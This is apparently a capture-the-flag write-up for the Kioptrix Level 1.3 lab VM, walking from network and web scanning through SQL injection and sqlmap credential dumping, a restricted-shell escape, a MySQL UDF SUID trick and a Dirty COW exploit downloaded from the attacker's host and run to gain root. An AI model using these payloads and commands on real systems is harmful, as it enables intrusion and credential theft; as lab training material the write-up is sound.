KIOPTRIX Level 1.3 (#4)
Scanning
We first need to get the target IP.
nmap -sP 192.168.1.0/24
$ nmap -sP 192.168.1.0/24
​
Starting Nmap 7.60 ( https://nmap.org ) at 2020-05-15 08:12 UTC
Nmap scan report for _gateway (192.168.1.1)
Host is up (0.0028s latency).
Nmap scan report for 192.168.1.3
Host is up (0.0021s latency).
Nmap scan report for 192.168.1.6
Host is up (0.076s latency).
Nmap scan report for 192.168.1.8
Host is up (0.0021s latency).
Nmap scan report for 192.168.1.12
Host is up (0.010s latency).
Nmap scan report for avm (192.168.1.14)
Host is up (0.00067s latency).
Nmap scan report for 192.168.1.15
Host is up (0.075s latency).
Nmap scan report for 192.168.1.100
Host is up (0.0024s latency).
Nmap done: 256 IP addresses (8 hosts up) scanned in 3.03 secondsTarget IP is 192.168.1.15
Nmap
$ nmap -A -Pn 192.168.1.15 -oN nmap.scan
# Nmap 7.60 scan initiated Fri May 15 08:22:12 2020 as: nmap -A -Pn -oN nmap.scan 192.168.1.15
Nmap scan report for 192.168.1.15
Host is up (0.017s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_ 2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -24d02h55m48s, deviation: 0s, median: -24d02h55m48s
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Unix (Samba 3.0.28a)
| Computer name: Kioptrix4
| NetBIOS computer name:
| Domain name: localdomain
| FQDN: Kioptrix4.localdomain
|_ System time: 2020-04-21T01:28:29-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri May 15 08:24:19 2020 -- 1 IP address (1 host up) scanned in 127.09 secondsFindings : Apache web server is running on port 80, OpenSSH on port 22
Scanning web server with dirb
$ dirb http://192.168.1.15 | tee dirb.sacn
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri May 15 08:40:56 2020
URL_BASE: http://192.168.1.15/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.15/ ----
+ http://192.168.1.15/cgi-bin/ (CODE:403|SIZE:327)
==> DIRECTORY: http://192.168.1.15/images/
+ http://192.168.1.15/index (CODE:200|SIZE:1255)
+ http://192.168.1.15/index.php (CODE:200|SIZE:1255)
==> DIRECTORY: http://192.168.1.15/john/
+ http://192.168.1.15/logout (CODE:302|SIZE:0)
+ http://192.168.1.15/member (CODE:302|SIZE:220)
+ http://192.168.1.15/server-status (CODE:403|SIZE:332)
---- Entering directory: http://192.168.1.15/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.15/john/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Fri May 15 08:41:15 2020Nikto Scan
$ nikto -host 192.168.1.15 | tee nikto.scan
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP: 192.168.1.15
+ Target Hostname: 192.168.1.15
+ Target Port: 80
+ Start Time: 2020-05-15 08:44:06 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 5.4.4)
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /icons/README, inode: 98933, size: 5108, mtime: 0x438c0358aae80
+ OSVDB-3233: /icons/README: Apache default file found.
+ Cookie PHPSESSID created without the httponly flag
+ 6544 items checked: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2020-05-15 08:44:46 (GMT0) (40 seconds)
---------------------------------------------------------------------------
+ 1 host(s) testedOS Enumeration with enum4linx
$ enum4linux.pl 192.168.1.15 | tee enum4linx.scan
WARNING: polenum.py is not in your path. Check that package is installed and your PATH is sane.
WARNING: ldapsearch is not in your path. Check that package is installed and your PATH is sane.
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri May 15 09:35:46 2020
==========================
| Target Information |
==========================
Target ........... 192.168.1.15
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
...............
...............
S-1-22-1-1001 Unix User\john (Local User)
S-1-22-1-1002 Unix User\robert (Local User)
=============================================
| Getting printer info for 192.168.1.15 |
=============================================
mkdir failed on directory /var/run/samba/msg.lock: Permission denied
No printers returned.
enum4linux complete on Fri May 15 09:37:03 2020filtering user accounts information from above scan
$ cat enum4linx.scan | grep Account
index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody Name: nobody Desc: (null)
index: 0x2 RID: 0xbbc acb: 0x00000010 Account: robert Name: ,,, Desc: (null)
index: 0x3 RID: 0x3e8 acb: 0x00000010 Account: root Name: root Desc: (null)
index: 0x4 RID: 0xbba acb: 0x00000010 Account: john Name: ,,, Desc: (null)
index: 0x5 RID: 0xbb8 acb: 0x00000010 Account: loneferret Name: loneferret,,, Desc: (null)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)users found : robert, root, john, loneferret
Scan with dirsearch
$ dirsearch.py -u http://192.168.1.15 -e php,asp,aspx,jsp,html,zip,jar,sql --plain-text-report=
_|. _ _ _ _ _ _|_ v0.3.
(_||| _) (/_(_|| (_| )
Extensions: php, asp, aspx, jsp, html, zip, jar, sql | HTTP method: get | Threads: 10 | Wordlist size: 8679
Error Log: /home/ajay/tools/dirsearch/logs/errors-20-05-15_08-47-32.log
Target: http://192.168.1.15
[08:47:32] Starting:
[08:47:38] 403 - 323B - /.hta [08:47:38] 403 - 330B - /.ht_wsr.txt
.....
.....
[08:49:57] 302 - 220B - /member/login.html -> index.php
[08:49:57] 302 - 220B - /member/login.jar -> index.php
[08:49:57] 302 - 220B - /member/login.sql -> index.php
[08:49:57] 302 - 220B - /member/login.py -> index.php
[08:49:57] 302 - 220B - /member/login.rb -> index.php
[08:49:57] 302 - 220B - /member/logon -> index.php
[08:49:57] 302 - 220B - /member/signin -> index.php
[08:50:31] 403 - 333B - /server-status/
[08:50:31] 403 - 332B - /server-status
Task CompletedFiltering the output
$ cat dirsearchReport | grep 200
200 109B http://192.168.1.15:80/checklogin.php
200 109B http://192.168.1.15:80/checklogin
200 298B http://192.168.1.15:80/database.sql
200 1KB http://192.168.1.15:80/index
200 1KB http://192.168.1.15:80/index.php
200 1KB http://192.168.1.15:80/index.php/login/There is database.sql on the server http://192.168.1.15/database.sql
username john
password 1234The above credits does not work on Member Login page
SQL Vulnerability : By fuzzing inputs of Member Login page, we find that there is an SQL vulnerability on login password field, payload "Name:john and password:' or 1='1 --+ user logged in and auth john/MyNameIsJohn is showed.
SQLMap
$ sqlmap -u "http://192.168.1.15/checklogin.php" --data="myusername=john&mypassword=12345&submit"
$ sqlmap -u "http://192.168.1.15/checklogin.php" --data="myusername=john&mypassword=12345&submit=Login" --dbs
sqlmap got a 302 redirect to 'http://192.168.1.15:80/login_success.php?username=john'. Do you want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] y
[*] information_schema
[*] members
[*] mysql
$ sqlmap -u "http://192.168.1.15/checklogin.php" --data="myusername=john&mypassword=12345&submit=Login" --tables -D members
sqlmap got a 302 redirect to 'http://192.168.1.15:80/login_success.php?username=john'. Do you want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] y
Database: members
[1 table]
+---------+
| members |
+---------+
$ sqlmap -u "http://192.168.1.15/checklogin.php" --data="myusername=john&mypassword=12345&submit=Login" --columns -D members -T members
sqlmap got a 302 redirect to 'http://192.168.1.15:80/login_success.php?username=john'. Do you want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] y
Database: members
Table: members
[3 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| id | int(4) |
| password | varchar(65) |
| username | varchar(65) |
+----------+-------------+
$ sqlmap -u "http://192.168.1.15/checklogin.php" --data="myusername=john&mypassword=12345&submit=Login" --dump -D members -T members
sqlmap got a 302 redirect to 'http://192.168.1.15:80/login_success.php?username=john'. Do you want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] y
[16:12:12] [INFO] retrieved: 1
[16:12:13] [INFO] retrieved: MyNameIsJohn
[16:12:25] [INFO] retrieved: john
[16:12:29] [INFO] retrieved: 2
[16:12:30] [INFO] retrieved: ADGAdsafdfwt4gadfga==
[16:12:48] [INFO] retrieved: robert
Database: members
Table: members
[2 entries]
+----+----------+-----------------------+
| id | username | password |
+----+----------+-----------------------+
| 1 | john | MyNameIsJohn |
| 2 | robert | ADGAdsafdfwt4gadfga== |
+----+----------+-----------------------+The credits are :
With the above credits we can get access to the ssh server, which gives us a restricted shell.
$ ssh john@192.168.1.15
john@192.168.1.15's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$
john:~$ help
cd clear echo exit help ll lpath lsRegular User Account Access
Privilege Escalation
In this shell we can run limited amount of commands, otherwise it gives error messages
john:~$ ls -al
total 28
drwxr-xr-x 2 john john 4096 2012-02-04 18:39 .
drwxr-xr-x 5 root root 4096 2012-02-04 18:05 ..
-rw------- 1 john john 1133 2020-04-21 01:08 .bash_history
-rw-r--r-- 1 john john 220 2012-02-04 18:04 .bash_logout
-rw-r--r-- 1 john john 2940 2012-02-04 18:04 .bashrc
-rw-r--r-- 1 john john 3105 2020-04-21 01:08 .lhistory
-rw-r--r-- 1 john john 586 2012-02-04 18:04 .profile
john:~$ pwd
*** unknown command: pwd
ohn:~$ cat /etc/passwd
*** unknown command: catAnd if we violate the rules then it kicks us out of shell
john:~$ cd ..
*** forbidden path -> "/home/"
*** You have 0 warning(s) left, before getting kicked out.
This incident has been reported.
john:~$ cd ..
*** forbidden path -> "/home/"
*** Kicked out
Connection to 192.168.1.15 closed.But when giving random inputs i get the error for input echo $)
john:~$ echo $)
/bin/sh: Syntax error: ")" unexpected
Traceback (most recent call last):
File "/bin/kshell", line 27, in <module>
lshell.main()
File "/usr/lib/python2.5/site-packages/lshell.py", line 1219, in main
cli.cmdloop()
File "/usr/lib/python2.5/site-packages/lshell.py", line 410, in cmdloop
stop = self.onecmd(line)
File "/usr/lib/python2.5/site-packages/lshell.py", line 531, in onecmd
func = getattr(self, 'do_' + cmd)
File "/usr/lib/python2.5/site-packages/lshell.py", line 134, in __getattr__
if self.check_path(self.g_line) == 1:
File "/usr/lib/python2.5/site-packages/lshell.py", line 327, in check_path
item = cout.readlines()[0].split(' ')[0].strip()
IndexError: list index out of range
Connection to 192.168.1.15 closed.which looks like python error message, and its possible that the above shell is a python script or running within python interpreter, and if this is the case then lets try to run a shell inside it
john:~$ os.system("/bin/sh")
*** unknown command: os.system("/bin/sh")
john:~$It shows error, but by placing any supported command it gives an unrestricted shell
john:~$ ls os.system("/bin/bash")
bash-3.2$
bash-3.2$ pwd
/home/john
bash-3.2$Now try to get a root shell
bash-3.2$ whoami
john
bash-3.2$ sudo su
[sudo] password for john:
john is not in the sudoers file. This incident will be reported.
bash-3.2$But john is not on the sudoers list.
Enumerating the System
Enumerating the Operating system and kernel version :
bash-3.2$ cat /etc/issue
Welcome to LigGoat Security Server
bash-3.2$ cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=8.04
DISTRIB_CODENAME=hardy
DISTRIB_DESCRIPTION="Ubuntu 8.04.3 LTS"
bash-3.2$ uname -a
Linux Kioptrix4 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/LinuxEnumerating linux files for SUID, GUID permission bits :
// sticky bit permissions
$ find / -perm -1000 -type d 2>/dev/null
/var/spool/samba
/var/spool/cron/atjobs
/var/spool/cron/atspool
/var/spool/cron/crontabs
/var/lib/php5
/var/lib/samba/usershares
/var/tmp
/var/lock
/dev/shm
/tmp
// GUID permission
$ find / -perm -g=s -type f 2>/dev/null
/usr/bin/wall
/usr/bin/expiry
/usr/bin/crontab
/usr/bin/bsd-write
/usr/bin/mlocate
/usr/bin/at
/usr/bin/chage
/usr/bin/ssh-agent
/usr/sbin/uuidd
/sbin/unix_chkpwd
// SUID permission
/usr/lib/apache2/suexec
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/pt_chown
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/traceroute6.iputils
/usr/bin/newgrp
/usr/bin/sudoedit
/usr/bin/chfn
/usr/bin/arping
/usr/bin/gpasswd
/usr/bin/mtr
/usr/bin/passwd
/usr/bin/at
/usr/sbin/pppd
/usr/sbin/uuidd
/lib/dhcp3-client/call-dhclient-script
/bin/mount
/bin/ping6
/bin/fusermount
/bin/su
/bin/ping
/bin/umount
/bin/bash
/sbin/umount.cifs
/sbin/mount.cifsThere is nothing interesting file found here, if binaries like sudoers, vim, nmap is listed here then we can use them to escalate privilege.
Search for application and services with root privilege :
bash-3.2$ ps aux | grep root
root 4623 0.0 0.0 1716 488 tty5 Ss+ 14:20 0:00 /sbin/getty 38400 tty5
root 4627 0.0 0.0 1716 488 tty2 Ss+ 14:20 0:00 /sbin/getty 38400 tty2
root 4629 0.0 0.0 1716 484 tty3 Ss+ 14:20 0:00 /sbin/getty 38400 tty3
root 4632 0.0 0.0 1716 488 tty6 Ss+ 14:20 0:00 /sbin/getty 38400 tty6
root 4690 0.0 0.0 1872 544 ? S 14:20 0:00 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/km
root 4711 0.0 0.0 5316 984 ? Ss 14:20 0:00 /usr/sbin/sshd
root 4767 0.0 0.0 1772 524 ? S 14:20 0:00 /bin/sh /usr/bin/mysqld_safe
root 4809 0.0 1.5 126988 16232 ? Sl 14:20 0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/
root 4811 0.0 0.0 1700 556 ? S 14:20 0:00 logger -p daemon.err -t mysqld_safe -i -t mysql
root 4884 0.0 0.1 6528 1328 ? Ss 14:20 0:00 /usr/sbin/nmbd -DAs we can see the mysqld is running within root privilege, and by enumerating web root directory we can get the credits for login to mysql
bash-3.2$ cd /var/www
bash-3.2$ ls
checklogin.php5database.sql images index.php john login_success.php logout.php member.php robert
bash-3.2$ cat checklogin.php | head -n15
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name
// Connect to server and select databse.
mysql_connect("$host", "$username", "$password")or die("cannot connect");
mysql_select_db("$db_name")or die("cannot select DB");
// Define $myusername and $mypassword
$myusername=$_POST['myusername'];
$mypassword=$_POST['mypassword'];
bash-3.2$As we can see the username is root and password is blank, now try this to login to mysql
bash-3.2$ mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 7
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| members |
| mysql |
+--------------------+
3 rows in set (0.00 sec)
mysql>Gaining Root
Method 1 :
The mysql deamon can running with root privilege can be used to get a root shell
mysql> use mysql;
mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
mysql> select sys_exec('chmod u+s /bin/bash');
mysql> quitNow on shell
bash-3.2$ ls -al /bin/bash
-rwsr-xr-x 1 root root 702160 2008-05-12 14:33 /bin/bash
bash-3.2$ bash -p
bash-3.2# whoami
root
cd /root
bash-3.2# ls
congrats.txt lshell-0.9.12
bash-3.2# cat congrats.txt
Congratulations!
You've got root.
There is more then one way to get root on this system. Try and find them.
I've only tested two (2) methods, but it doesn't mean there aren't more.
As always there's an easy way, and a not so easy way to pop this box.
Look for other methods to get root privileges other than running an exploit.
It took a while to make this. For one it's not as easy as it may look, and
also work and family life are my priorities. Hobbies are low on my list.
Really hope you enjoyed this one.
If you haven't already, check out the other VMs available on:
www.kioptrix.com
Thanks for playing,
loneferretMethod 2 :
The kernel version is 2.6.24, so we can use the kernel exploit (dirty cow vulnerability) to escalate privilege.
Exploit link : https://www.exploit-db.com/exploits/40839
The above exploit creates a new user 'firefart' with root privilege. Also note that the kioptrix1.4 VM does not have gcc compiler, so compole the binary within 32bit architecture, downlaod it on the vm then execute it. Compilation of binary :
$ gcc -pthread exploit.c -o exploit -lcryptNow download it into vm and run it.
bash-3.2$ cd /tmp
bash-3.2$ wget http://192.168.1.8:8000/dirty_cow
bash-3.2$ ./dirty_cow
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password:
Complete line:
firefart:fi3LLch28IK7A:0:0:pwned:/root:/bin/bash
mmap: b7f0e000
madvise 0
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '12345'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '12345'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwdThe exploit will asks to setup the password for new user, Now try to get root shell
bash-3.2$ su firefart
Password:
Failed to add entry for user firefart.
firefart@Kioptrix4:/home/john# whoami
firefart
firefart@Kioptrix4:/home/john# cd /root
firefart@Kioptrix4:~# ls
congrats.txt lshell-0.9.12
firefart@Kioptrix4:~# cat congrats.txt
Congratulations!
You've got root.
There is more then one way to get root on this system. Try and find them.
I've only tested two (2) methods, but it doesn't mean there aren't more.
As always there's an easy way, and a not so easy way to pop this box.
Look for other methods to get root privileges other than running an exploit.
It took a while to make this. For one it's not as easy as it may look, and
also work and family life are my priorities. Hobbies are low on my list.
Really hope you enjoyed this one.
If you haven't already, check out the other VMs available on:
www.kioptrix.com
Thanks for playing,
loneferret
firefart@Kioptrix4:~#�
Last updated
